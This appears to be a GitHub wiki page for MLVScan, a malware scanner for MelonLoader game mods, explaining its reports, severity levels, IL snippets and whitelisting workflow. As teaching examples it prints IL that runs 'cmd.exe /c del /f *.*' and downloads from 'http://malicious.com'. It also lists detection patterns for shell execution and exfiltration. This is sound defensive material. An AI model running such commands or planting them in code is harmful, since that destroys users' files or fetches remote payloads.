-
-
Notifications
You must be signed in to change notification settings - Fork 0
Scan Reports
When MLVScan detects suspicious patterns in a mod, it generates detailed reports to help you understand the threat and make informed decisions.
Reports are saved in:
YourGame/UserData/MLVScan/Reports/
├── ModName_20231215_123456.report.txt # Main report
├── Prompts/
│ └── ModName.prompt.md # LLM analysis prompt
└── IL/
└── ModName_20231215_123456.il.txt # Full IL dump (optional)
When a suspicious mod is detected, you'll see:
[MLVScan] ======= DETAILED SCAN REPORT =======
[MLVScan] SUSPICIOUS MOD: SuspiciousMod.dll
[MLVScan] SHA256 Hash: abc123def456...
[MLVScan] -------------------------------
[MLVScan] Total suspicious patterns found: 8
[MLVScan] Severity breakdown:
[MLVScan] CRITICAL: 2 issue(s)
[MLVScan] HIGH: 3 issue(s)
[MLVScan] MEDIUM: 3 issue(s)
[MLVScan] -------------------------------
[MLVScan] Suspicious patterns found:
[MLVScan] [CRITICAL] Process execution detected (2 instances)
[MLVScan] * At: SuspiciousClass::MaliciousMethod
[MLVScan] Code Snippet (IL):
[MLVScan] IL_0001: ldstr "cmd.exe"
[MLVScan] IL_0006: call System.Diagnostics.Process::Start
The generated .report.txt file contains:
-
Header Information
- Timestamp
- Mod filename
- SHA256 hash
- File paths
- Total findings count
-
Severity Breakdown
- Count of Critical findings
- Count of High findings
- Count of Medium findings
- Count of Low findings
-
Detailed Findings
- Grouped by pattern type
- Severity level for each pattern
- Number of instances
- Specific locations in code
- IL code snippets
-
Security Notice
- Guidance on next steps
- Community resources
- Malware removal tools
What it means: Highly dangerous activities that are rarely legitimate in mods.
Examples:
- Executing Windows shell commands
- Loading assemblies from encrypted streams
- Sending data to external servers
- Creating auto-run mechanisms
Action: DO NOT WHITELIST without extensive community verification.
What it means: Dangerous behaviors that might be legitimate in some contexts.
Examples:
- Starting external processes
- Using reflection to invoke hidden methods
- Modifying Windows registry
- Numeric-encoded strings
Action: Investigate thoroughly before whitelisting.
What it means: Patterns that could be benign or malicious depending on context.
Examples:
- Base64 encoding/decoding
- Hex string manipulation
- Byte array operations
- P/Invoke to native DLLs
Action: Review the specific usage. Often false positives for legitimate features.
What it means: Minor patterns with low risk.
Examples:
- Accessing environment variables
- Reading system paths
Action: Usually safe to whitelist if from trusted source.
Reports include IL (Intermediate Language) code snippets. Here's how to read them:
IL_0000: ldstr "cmd.exe" # Load string "cmd.exe"
IL_0005: ldstr "/c del /f *.*" # Load string "/c del /f *.*"
IL_000a: call Process::Start # Call Process.Start method
-
ldstr- Load string -
call- Call method -
callvirt- Call virtual method -
newobj- Create new object -
stloc- Store to local variable -
ldloc- Load from local variable -
ldc.i4- Load integer constant
Red Flags:
- Suspicious strings (URLs, commands, passwords)
- Unusual method calls (Process.Start, Registry.SetValue)
- Obfuscated patterns (numeric-encoded strings)
Legitimate Use:
- Game API calls
- Standard .NET operations
- UI operations
Why flagged: Uses extensive reflection and dynamic invocation
Pattern: High severity - Reflection, DllImport, Process operations
Safe to whitelist?: Yes, if from official source
Hash: Check MLVScan's default whitelist
Why flagged: Loads data from streams, uses Base64
Pattern: Medium severity - Base64, LoadFromStream, byte arrays
Safe to whitelist?: Yes, if from trusted mod author
Verification: Review what assets are being loaded
Why flagged: Makes HTTP requests, sends data
Pattern: Critical severity - DataExfiltration, network calls
Safe to whitelist?: Maybe - investigate what data is sent where
Verification: Ask mod author about network usage
Single instance: Might be false positive
[HIGH] Reflection usage detected (1 instance)
Multiple instances: More concerning
[HIGH] Reflection usage detected (12 instances)
Multiple instances suggest the mod heavily relies on suspicious patterns.
High Risk Combination:
[CRITICAL] Shell execution (1 instance)
[HIGH] Obfuscated strings (5 instances)
[MEDIUM] Base64 decoding (3 instances)
This suggests encoded commands being executed.
Lower Risk Combination:
[MEDIUM] Base64 decoding (2 instances)
[LOW] Environment path access (1 instance)
Might be loading configuration or assets.
MLVScan generates a prompt file you can use with ChatGPT or other LLMs:
UserData/MLVScan/Reports/Prompts/ModName.prompt.md
- Open the
.prompt.mdfile - Copy the entire contents
- Paste into ChatGPT/Claude/Gemini
- Ask: "Is this malware or a false positive?"
- Complete IL dump of the assembly
- List of suspicious findings
- Context about detection rules
- Questions to help analyze intent
- LLMs are NOT perfect at detecting malware
- Use as a supplementary tool
- Always verify with the community
- Don't trust AI blindly
Enable in MelonPreferences.cfg:
[MLVScan]
DumpFullIlReports = trueGenerates complete IL disassembly of flagged mods:
UserData/MLVScan/Reports/IL/ModName_timestamp.il.txt
- Deep analysis of suspicious code
- Sharing with security researchers
- Understanding complex malware
- Contributing to improved detection rules
Full IL dumps show the entire assembly structure:
.assembly ModName
{
.ver 1:0:0:0
}
.class public SuspiciousClass
{
.method public static void MaliciousMethod()
{
IL_0000: ldstr "http://malicious.com"
IL_0005: call WebClient::DownloadString
...
}
}
Use this flowchart to decide what to do:
Mod flagged by MLVScan
│
├─► Critical severity?
│ ├─► Yes → DO NOT WHITELIST
│ │ Ask community first
│ └─► No → Continue
│
├─► From trusted source?
│ ├─► No → DO NOT WHITELIST
│ └─► Yes → Continue
│
├─► Multiple users confirm safe?
│ ├─► No → Wait for verification
│ └─► Yes → Continue
│
├─► Patterns make sense for mod purpose?
│ ├─► No → DO NOT WHITELIST
│ └─► Yes → Continue
│
└─► Safe to whitelist
Add SHA256 hash to whitelist
-
Modding Discord: discord.gg/UD4K4chKak
- Post in #mod-releases MLVScan thread
- Share SHA256 hash (not the file!)
- Ask if others have verified it
-
GitHub Issues: For confirmed false positives
- Include hash
- Include report file
- Explain mod's legitimate purpose
-
Mod Author: Contact directly
- Ask about flagged patterns
- Request explanation
- Verify it's the official version
- Read the entire report carefully
- Check severity levels
- Ask the community
- Verify the mod source
- Keep reports for reference
- Ignore Critical findings
- Whitelist without understanding
- Share mod files publicly
- Trust unknown sources
- Disable MLVScan entirely
[HIGH] Reflection usage detected (15 instances)
[HIGH] DllImport usage detected (8 instances)
[MEDIUM] Base64 rule triggered (3 instances)
Verdict: UnityExplorer - debugging tool
Action: Safe to whitelist (in default whitelist)
[CRITICAL] Shell execution detected (1 instance)
[CRITICAL] Data exfiltration detected (2 instances)
[HIGH] Obfuscated strings detected (12 instances)
Verdict: Malicious mod
Action: DELETE AND SCAN SYSTEM
[MEDIUM] Base64 rule triggered (2 instances)
[LOW] Environment path access (1 instance)
Verdict: Custom asset loader
Action: Review code, likely safe if from trusted source
When using MLVScan.DevCLI for development scanning, the output format differs from the runtime plugin:
MLVScan Developer Report
========================
Assembly: MyMod.dll
Findings: 2
[High] Detected executable write near persistence-prone directory
Rule: PersistenceRule
Occurrences: 1
Developer Guidance:
For mod settings, use MelonPreferences. For save data, use the game's
save system or Application.persistentDataPath with .json extension.
📚 https://melonwiki.xyz/#/modders/preferences
Suggested APIs: MelonPreferences.CreateEntry<T>
Locations:
• MyMod.SaveManager.SaveSettings:42
────────────────────────────────────────
- Developer Guidance: Each finding includes specific remediation advice
- Documentation Links: Direct links to relevant MelonLoader documentation
- Alternative APIs: Suggests safe alternatives to suspicious patterns
- IsRemediable: Indicates whether a safe alternative exists
For CI/CD integration, use the --json flag:
{
"assemblyName": "MyMod.dll",
"totalFindings": 2,
"findings": [
{
"ruleId": "PersistenceRule",
"description": "Detected executable write near persistence-prone directory",
"severity": "High",
"location": "MyMod.SaveManager.SaveSettings:42",
"guidance": {
"remediation": "For mod settings, use MelonPreferences...",
"documentationUrl": "https://melonwiki.xyz/#/modders/preferences",
"alternativeApis": ["MelonPreferences.CreateEntry<T>"],
"isRemediable": true
}
}
]
}For more information on the Developer CLI, see Developer CLI Guide.
- Whitelisting - How to whitelist verified mods
- Getting Started - Initial setup
- Architecture - Understanding detection rules
- FAQ - Common questions